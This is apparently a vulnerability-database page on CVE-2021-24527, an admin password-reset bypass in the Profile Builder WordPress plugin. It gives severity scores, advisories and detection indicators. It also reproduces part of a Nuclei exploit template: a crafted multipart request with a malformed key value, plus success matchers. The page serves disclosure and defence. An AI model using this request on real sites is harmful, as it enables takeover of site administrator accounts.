CVE-2021-24527
published 2021-08-16CVE-2021-24527: The User Registration & User Profile – Profile Builder WordPress plugin before 3.4.9 has a bug allowing any user to reset the password of the admin of the…
PriorityP181critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
7.70%
93.8th percentile
The User Registration & User Profile – Profile Builder WordPress plugin before 3.4.9 has a bug allowing any user to reset the password of the admin of the blog, and gain unauthorised access, due to a bypass in the way the reset key is checked. Furthermore, the admin will not be notified of such change by email for example.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cozmoslabs | profile_builder | < 3.4.9 | 3.4.9 |
Detection & IOCsextracted from sources · hover to see the quote
url/?key=%3Ca%
- →Exploit sends a multipart form POST with a `password_recovery_nonce_field2` field and a malformed/bypassed `key` parameter (URL-encoded `<a`) in `_wp_http_referer`, triggering unauthorized admin password reset.
- →Successful exploitation results in the response body containing the string 'Your password has been successfully changed' with HTTP 200 status — use this as a detection signal in WAF/proxy logs.
- →The exploit uses a multipart boundary `------WebKitFormBoundary8nxJ9mBo6lwGYE0K` — presence of this specific boundary in POST requests to password recovery endpoints may indicate exploitation attempts.
- →The bypass abuses the reset key validation in Profile Builder (WordPress plugin) versions before 3.4.9; monitor POST requests to password recovery endpoints containing `password_recovery_nonce_field2` alongside a crafted/malformed `key` value. ↗
- ·The `skip-variables-check: true` directive in the PoC template indicates the nonce value (`{{nonce}}`) must be dynamically resolved at runtime; static replay of the request without a valid nonce may not succeed.
- ·The admin is not notified of the password change via email, making this attack stealthy and harder to detect through standard notification channels. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cjhq-3qxp-7658: The User Registration & User Profile – Profile Builder WordPress plugin before 3
ghsa_unreviewed·2022-05-24
CVE-2021-24527 [CRITICAL] CWE-287 GHSA-cjhq-3qxp-7658: The User Registration & User Profile – Profile Builder WordPress plugin before 3
The User Registration & User Profile – Profile Builder WordPress plugin before 3.4.9 has a bug allowing any user to reset the password of the admin of the blog, and gain unauthorised access, due to a bypass in the way the reset key is checked. Furthermore, the admin will not be notified of such change by email for example.
VulnCheck
cozmoslabs profile_builder Improper Authentication
vulncheck·2021·CVSS 9.8
CVE-2021-24527 [CRITICAL] cozmoslabs profile_builder Improper Authentication
cozmoslabs profile_builder Improper Authentication
The User Registration & User Profile – Profile Builder WordPress plugin before 3.4.9 has a bug allowing any user to reset the password of the admin of the blog, and gain unauthorised access, due to a bypass in the way the reset key is checked. Furthermore, the admin will not be notified of such change by email for example.
Affected: cozmoslabs profile_builder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profile-builder/profile-builder-348-admin-access-via-password-reset; https://app.crowdsec.net/cti/cve-explorer/CVE-2021-24527
No detection rules found.
Nuclei
Profile Builder < 3.4.9 - Improper Authentication
nuclei·CVSS 9.8
CVE-2021-24527 [CRITICAL] Profile Builder < 3.4.9 - Improper Authentication
Profile Builder
------WebKitFormBoundary8nxJ9mBo6lwGYE0K
Content-Disposition: form-data; name="password_recovery_nonce_field2"
{{nonce}}
------WebKitFormBoundary8nxJ9mBo6lwGYE0K
Content-Disposition: form-data; name="_wp_http_referer"
/?key=%3Ca%
------WebKitFormBoundary8nxJ9mBo6lwGYE0K--
skip-variables-check: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Your password has been successfully changed")'
condition: and
extractors:
- type: dsl
dsl:
- pass
# digest: 4a0a00473045022100a918d9cf2358ca3649fc90c28036ea4238c99814a4f1fd26d9e9c046adaa1bbd02206ea12c558c84b59b3efbc8eccb67ec6976869a7287e7a2715ad2800a4ecf3e65:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2021-08-16
Published
Exploited in the wild